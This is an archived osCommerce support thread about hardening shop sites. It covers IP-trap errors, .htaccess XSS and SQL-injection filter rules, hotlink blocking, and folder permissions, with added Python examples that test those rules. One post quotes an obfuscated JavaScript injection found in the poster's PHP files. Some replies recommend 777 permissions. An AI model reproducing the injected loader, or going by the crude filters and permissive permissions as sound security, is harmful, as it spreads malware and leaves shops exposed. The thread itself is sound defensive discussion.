How to secure your osCommerce 2.2 site.


This topic has been archived. This means that you cannot reply to this topic.
656 replies to this topic

#41   rednme

rednme
  • Members
  • 21 posts

Posted 03 January 2009 - 16:37

Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: Permission denied in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 7

Warning: Invalid argument supplied for foreach() in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 15

This is coming from the Application Top

I also wasn't getting banned... my IP never showed up... but then again maybe it all has to do with the error above... I disabled the application top code for now... any takers on this?


Try replacing the DOCUMENT_ROOT portion with the absolute path to the files, like:

/var/www/vhosts/themancaveoutletstore.com/httpdocs/banned/IP_Trapped.txt

in
includes/secret.php
and
personal/index.php

and change the permissions on IP_Trapped.txt to 777 or 666.

genesis

Edited by rednme, 03 January 2009 - 16:39.


#42   carricksupplies

carricksupplies
  • Members
  • 12 posts

Posted 04 January 2009 - 14:44

I have installed all the contributions except the Security Pro contribution, they seem to be working fine.

Does anyone know how I would go about setting up a cron job to automatically backup the database every 3 hours?

What would the code be to do this?

Thanks,

Martyn

#43   airbrushmaster

airbrushmaster
  • Members
  • 326 posts

Posted 07 January 2009 - 16:09

Hi, I just installed SiteMonitor_V_1.7, but in admin when I click the first button it says "Reference file creation failed".

#44   airbrushmaster

airbrushmaster
  • Members
  • 326 posts

Posted 07 January 2009 - 16:31

> Hi, I just installed SiteMonitor_V_1.7, but in admin when I click the first button it says "Reference file creation failed".

It's OK, I have taken it off instead.

#45   Eim2

Eim2
  • Members
  • 47 posts

Posted 12 January 2009 - 08:57

Hello,

There is a little PROBLEM here: http://addons.oscommerce.com/info/6044

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance by chrish123 added 19 Jul 2008.

When I click the <buy now> button on advanced_search_result.php the product is added to the customer's basket,
BUT I get redirected to iplog.txt telling me I should go away ... which is no good at all.

When those lines are commented out of .htaccess, clicking the button gives no redirect:

This is the relevant part in .htaccess
# extra anti uri and xss attack script 2 - sql injection prevention
 Options +FollowSymLinks
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteRule (,|;|<|>|'|`) /log.php [NC]

Should I keep only the pixclinic part of this contribution?
Thanks for your kind advice,
David
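To see offline which of these rules a given request would trip, here is an added example in Python; it is not part of the contribution or of this thread. It re-implements the five RewriteCond/RewriteRule pairs above with Python's `re` and runs them over constructed sample URLs shaped after osCommerce 2.2 advanced-search links (the parameter names are an assumption about the stock search form). It shows that the fourth rule fires on a harmless keyword containing an inch mark, because the browser sends the `"` as `%22` and the word `categories` later in the query string contains `or`, which is the kind of false positive that would produce a redirect on an ordinary buy-now click.

```python
import re
from urllib.parse import urlsplit

# The five RewriteCond/RewriteRule pairs from the quoted .htaccess fragment.
# In mod_rewrite a RewriteCond applies only to the RewriteRule directly after it,
# so each pair is an independent test; the last RewriteRule has no condition and
# matches the URL path rather than the query string. [NC] on every line means
# case-insensitive matching. Apache tests the raw, still-encoded QUERY_STRING,
# which is why the patterns list both '"' and '%22'.
RULES = [
    ("query", r'''("|%22).*(>|%3E|<|%3C).*'''),
    ("query", r'''(<|%3C).*script.*(>|%3E)'''),
    ("query", r'''(java script:).*(;).*'''),
    ("query", r'''(;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).*'''),
    ("path",  r'''(,|;|<|>|'|`)'''),
]
COMPILED = [(target, re.compile(pattern, re.IGNORECASE)) for target, pattern in RULES]


def matching_rule(url):
    """Return (rule number, matched text) for the first rule that would send
    this request to log.php, or (0, '') if the request passes untouched."""
    parts = urlsplit(url)
    subject = {"path": parts.path, "query": parts.query}
    for number, (target, regex) in enumerate(COMPILED, start=1):
        hit = regex.search(subject[target])
        if hit:
            return number, hit.group(0)
    return 0, ""


# Constructed sample requests, not captured from any real shop. They are shaped
# after osCommerce 2.2 advanced-search links; the parameter names are an
# assumption about the stock search form, not something this thread states.
SAMPLES = {
    # a normal "buy now" click from a search for a plain keyword
    "plain buy now": "/advanced_search_result.php?keywords=blue+shirt&action=buy_now&products_id=28",
    # the same click after searching for a keyword containing an inch mark:
    # the browser sends the double quote as %22, and "categories" later in the
    # query contains "or", so rule 4 fires on a harmless request
    "inch mark in keyword": "/advanced_search_result.php?keywords=6%22+pipe&categories_id=0&action=buy_now&products_id=28",
    # an encoded <script> tag in the keyword field, the case rule 2 is meant for
    "script tag in keyword": "/advanced_search_result.php?keywords=%3Cscript%3Ex%3C/script%3E",
}


def report(samples=SAMPLES):
    """Map each sample name to the rule number that catches it (0 = passes)."""
    return {name: matching_rule(url)[0] for name, url in samples.items()}


if __name__ == "__main__":
    for name, url in SAMPLES.items():
        number, text = matching_rule(url)
        verdict = f"caught by rule {number}: {text!r}" if number else "passes"
        print(f"{name:<24} {verdict}")
```

The matched text returned for the inch-mark sample runs from the `%22` to the end of the query string, which makes the cause visible: the rule does not look for an injection, it looks for a quote character followed anywhere by a short English word, and `or`, `and` and `if` occur inside ordinary parameter names and search terms. Any rule of this shape needs to be tested against the shop's own legitimate URLs before it is allowed to redirect customers.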

#46   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 12 January 2009 - 18:18

Do you still need to do all these things if you have a SSL certificate setup? Thanks

#47   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 15 January 2009 - 21:10

I hate using this forum because no one ever replies

#48   spooks

spooks
  • Members
  • 7,017 posts

Posted 15 January 2009 - 22:26

You have to be patient, we're providing free help, so you must wait till we have time.

The answer is yes; the SSL only allows a secure connection, it does not 'secure' your site.

The hackers are out there & if you don't protect it they WILL get you.

I have a test site for which there is no domain; it's not published & without the IP you'll never find it, yet even that got attacked!!
Sam

Remember, What you think I ment may not be what I thought I ment when I said it.

Contributions:


Auto Backup your Database, Easy way

Multi Images with Fancy Pop-ups, Easy way

Products in columns with multi buy etc etc

Disable any Category or Product, Easy way

Secure & Improve your account pages et al.

#49   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 15 January 2009 - 22:46

> You have to be patient, we're providing free help, so you must wait till we have time.
>
> The answer is yes; the SSL only allows a secure connection, it does not 'secure' your site.
>
> The hackers are out there & if you don't protect it they WILL get you.
>
> I have a test site for which there is no domain; it's not published & without the IP you'll never find it, yet even that got attacked!!

Thanks for your reply. I am paranoid about making my site more open to the public by launching it. I do appreciate the free help but I have to say more than half the time I post something I do not get a reply, not that it's your fault of course.

#50   suffolk

suffolk
  • Members
  • 5 posts

Posted 23 January 2009 - 07:23

Hi,
I'm not sure if this is the place for this, but as it's a security related issue, I hoped someone may have some ideas.

I've been using the 'whosonline' contrib for some time now, and as a result I've noticed an interesting connection to my site.
Basically, the 'customer' behaves like a bot, working its way through the pages of the site 24 x 7. It doesn't have a session ID, or appear to go anywhere it shouldn't, however it's a permanent visitor to the site, with its online time counter only resetting every 24 hrs, so at the least it's a resource hog.

-Now the weird part (to me at least!)
Its IP keeps changing! It cycles through various sets of IPs ranging from Yahoo bot to private/ISP/Google addresses. I have tried banning the IP addresses it uses, but it simply 'morphs' to a new one (I gave up after 50 addresses, as many were inside address pools used by ISPs, and I didn't wish to ban legitimate users) - the next weird part is that whosonline doesn't see this as a new visitor; it keeps the online time and entry time counters and updates the IP address.

Obviously there's some sort of spoofing going on here, the question is, how to stop it! - it only makes a database query every 30-40 seconds, so it's not tripping any DOS alarms on the server/firewall.


Has anyone else seen anything similar, or have any ideas about what this could be (and how to stop it)???

#51   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 26 January 2009 - 11:28

> Hello,
>
> There is a little PROBLEM here: http://addons.oscommerce.com/info/6044
>
> I've installed the latest Anti XSS+SQL Injection to help PCI Compliance by chrish123 added 19 Jul 2008.
>
> When I click the <buy now> button on advanced_search_result.php the product is added to the customer's basket,
> BUT I get redirected to iplog.txt telling me I should go away ... which is no good at all.
>
> When those lines are commented out of .htaccess, clicking the button gives no redirect:
>
> This is the relevant part in .htaccess
>
> # extra anti uri and xss attack script 2 - sql injection prevention
>  Options +FollowSymLinks
>  RewriteEngine On
>  RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
>  RewriteRule ^(.*)$ log.php [NC]
>  RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
>  RewriteRule ^(.*)$ log.php [NC]
>  RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
>  RewriteRule ^(.*)$ log.php [NC]
>  RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
>  RewriteRule ^(.*)$ log.php [NC]
>  RewriteRule (,|;|<|>|'|`) /log.php [NC]
>
> Should I keep only the pixclinic part of this contribution?
> Thanks for your kind advice,
> David

Advanced Search - 403 Forbidden error, saying a login is required on my site...


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#52   [200]

[200]
  • Members
  • 21 posts

Posted 26 January 2009 - 13:49

Hey guys,

I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...

c102916999516l497da75b3503d(l497da75b35734){ function l497da75b35f05(){return 16;} return (parseInt(l497da75b35734,l497da75b35f05()));}function l497da75b36f22(l497da75b37677){ function l497da75b38de9(){var l497da75b395b9=2;return l497da75b395b9;} var l497da75b37e48='';l497da75b39d8b=String.fromCharCode;for(l497da75b38618=0;l497da75b38618<l497da75b37677.length;l497da75b38618+=l497da75b38de9()){ l497da75b37e48+=(l497da75b39d8b(c102916999516l497da75b3503d(l497da75b37677.subst
r(l497da75b38618,l497da75b38de9()))));}return l497da75b37e48;} var x75='';var l497da75b3a55a='3C736'+x75+'3726'+x75+'970743E6'+x75+'96'+x75+'6'+x75+'28216'+x75+'D796'+x75+'96'+x75+'1297B6'+x75+'46'+x75+'F6'+x75+'3756'+x75+'D6'+x75+'56'+x75+'E742E77726'+x75+'9746'+x75+'528756'+x75+'E6'+x75+'5736'+x75+'36'+x75+'1706'+x75+'528202725336'+x75+'32536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'352532302536'+x75+'6'+x75+'52536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'42536'+x75+'332533312533302532302537332537322536'+x75+'3325336'+x75+'42532372536'+x75+'3825373425373425373025336'+x75+'125326'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2533322536'+x75+'6'+x75+'42536'+x75+'3525326'+x75+'52536'+x75+'6'+x75+'52536'+x75+'3525373425326'+x75+'6'+x75+'25326'+x75+'52536'+x75+'372536'+x75+'6'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'332536'+x75+'382536'+x75+'352536'+x75+'332536'+x75+'6'+x75+'225326'+x75+'52536'+x75+'382537342536'+x75+'6'+x75+'42536'+x75+'6'+x75+'32532372532302537372536'+x75+'392536'+x75+'342537342536'+x75+'3825336'+x75+'4253334253336'+x75+'2532302536'+x75+'382536'+x75+'352536'+x75+'392536'+x75+'372536'+x75+'3825373425336'+x75+'42533352533372533332532302537332537342537392536'+x75+'6'+x75+'32536'+x75+'3525336'+x75+'4253237253736'+x75+'2536'+x75+'392537332536'+x75+'392536'+x75+'322536'+x75+'392536'+x75+'6'+x75+'32536'+x75+'3925373425373925336'+x75+'12536'+x75+'382536'+x75+'392536'+x75+'342536'+x75+'342536'+x75+'352536'+x75+'6'+x75+'525323725336'+x75+'525336'+x75+'325326'+x75+'6'+x75+'2536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'52729293B7D76'+x75+'6'+x75+'172206'+x75+'D796'+x75+'96'+x75+'13D7472756'+x75+'53B3C2F736'+x75+'3726'+x75+'970743E';document.write(l497da75b36f22(l497da75b3a55a));</script>


How the hell do I get rid of this and prevent it from coming back?

Thanks.

#53   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 26 January 2009 - 13:56

> Hey guys,
>
> I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...
>
> How the hell do I get rid of this and prevent it from coming back?
>
> Thanks.

If you are not running RC2a, then you need to patch it.

If you are running RC2a, then, to the best of my knowledge, and all things considered, your web host provides the vulnerability and you need to change web hosts.



#54   mirza_yasir4

mirza_yasir4
  • Members
  • 105 posts

Posted 01 February 2009 - 08:56

Both Security PRO and IP Trap worked for me
But I am unable to use .htaccess security; when I put a .htaccess file onto the server, it gives me an internal server error, and then I cannot see my website or admin section.
Thanks and Regards
Yasir Imran Mirza
My Contributions

#55   revenson

revenson
  • Members
  • 49 posts

Posted 01 February 2009 - 18:59

> Both Security PRO and IP Trap worked for me
> But I am unable to use .htaccess security; when I put a .htaccess file onto the server, it gives me an internal server error, and then I cannot see my website or admin section.



Yes, I found the same thing a couple of days ago. My suggestion is to remove sections of the suggested .htaccess file from the bottom up until it works. I say that because I recall it was something near the bottom that was causing my problem.

#56   paper53558

paper53558
  • Members
  • 5 posts

Posted 02 February 2009 - 18:42

> Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.


I recently switched web hosts. I got the error about the images directory not being writable. The directory permissions were 755. I was also unable to add images to products with the permissions set at 755. I switched the permissions to 777 and everything uploaded and the error message went away. At my old web host, the images folder was set at 755 and everything worked fine. The old host was a shared hosting plan, the new host is a VPS plan. What do I need to configure or ask the host to do to get my permissions back to 755? Thanks!

#57   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 02 February 2009 - 18:44

Ask your host to turn on suEXEC; it will allow you to run 755 as 777 [as your old host did].
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#58   paper53558

paper53558
  • Members
  • 5 posts

Posted 02 February 2009 - 20:56

> Ask your host to turn on suEXEC; it will allow you to run 755 as 777 [as your old host did].
> Nic


Thanks for your help. SuExec was already turned on, but I checked and had the host turn on suPHP and put it in the .htaccess file and that did the trick.

#59   spooks

spooks
  • Members
  • 7,017 posts

Posted 10 February 2009 - 21:53

oops
Sam


#60   Moparcj5

Moparcj5
  • Members
  • 33 posts

Posted 15 February 2009 - 22:02

I had a problem with the htaccess protection contribution and hot linking images. Whenever I went to a secure part of my website such as login, checkout, etc., I would see the stolen image on those pages. Below I have added a line of code to this that fixed it. Hopefully this is done correctly and will not cause problems.

This is to help someone else out with the same problem. If there is anything wrong with this please let me know.

I have included an image for you to upload; please note if you use your images outside of your server (like linked into eBay) you cannot use this.

# stop hotlinking (gif/jpg) and serve alternate content
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURSITE\.COM/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^https://(www\.)?YOURSITE\.COM/.*$ [NC]
RewriteRule .*\.(gif|jpg)$ http://www.YOURSITE.COM/images/stolen.gif [R,NC,L]
</IfModule>

I have installed:
Oscommerce version 2.2rc2a, STS version 4.5.8, Header Tags SEO version 3.1.5, SEO Assistant version 2.1

Thanks
Joey
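To check a rule set like the one in this post against sample Referer values before deploying it, here is an added example in Python; it is not part of Joey's post or of the contribution. It re-implements the RewriteCond chain (an AND chain, with `!` negating a condition and `[NC]` making it case-insensitive) both with and without the added https line; the hostname `yoursite.com` is a placeholder and the sample referers are constructed.

```python
import re

# Placeholder for the shop's own hostname; substitute the real domain.
SITE = "yoursite.com"


def referer_conditions(site, allow_https):
    """Build the RewriteCond chain from the post as (negated, regex) pairs.
    Every condition must hold for the RewriteRule to fire; a leading '!'
    negates that one condition, and [NC] makes it case-insensitive."""
    host = re.escape(site)
    conds = [
        (True, re.compile(r"^$")),                                        # !^$
        (True, re.compile(r"^http://(www\.)?" + host + r"/.*$", re.I)),  # !^http://...
    ]
    if allow_https:  # the line added in the post
        conds.append((True, re.compile(r"^https://(www\.)?" + host + r"/.*$", re.I)))
    return conds


IMAGE_RULE = re.compile(r".*\.(gif|jpg)$", re.I)   # RewriteRule pattern with [NC]


def serves_stolen_image(path, referer, allow_https=True, site=SITE):
    """True if a request for `path` carrying the given Referer header would be
    redirected to images/stolen.gif by the rule set."""
    if not IMAGE_RULE.search(path):
        return False
    for negated, regex in referer_conditions(site, allow_https):
        matched = regex.search(referer) is not None
        # a negated condition fails when its pattern matches, and vice versa
        if matched == negated:
            return False
    return True


# Constructed sample Referer values, not real traffic.
CASES = [
    ("no referer", ""),
    ("own shop over http", "http://www.yoursite.com/product_info.php?products_id=28"),
    ("own shop over https", "https://www.yoursite.com/checkout_shipping.php"),
    ("another site", "http://some-other-site.example/page.html"),
]


def compare(cases=CASES, site=SITE):
    """For each referer: (blocked without the https line, blocked with it)."""
    return {
        name: (
            serves_stolen_image("images/logo.gif", ref, allow_https=False, site=site),
            serves_stolen_image("images/logo.gif", ref, allow_https=True, site=site),
        )
        for name, ref in cases
    }


if __name__ == "__main__":
    for name, (before, after) in compare().items():
        print(f"{name:<22} without https line: {before!s:<5} with https line: {after}")
```

The "own shop over https" row reproduces the symptom in the post: a page served over HTTPS sends an `https://` Referer, so with only the `http://` condition the shop's own checkout pages look like hotlinkers and get the stolen image. Two caveats apply to any rule of this shape: the Referer header is set by the client and can be omitted or forged, so this is a bandwidth measure rather than an access control, and the `!^$` condition deliberately lets referer-less requests through, which is what keeps direct opens and privacy-conscious browsers working.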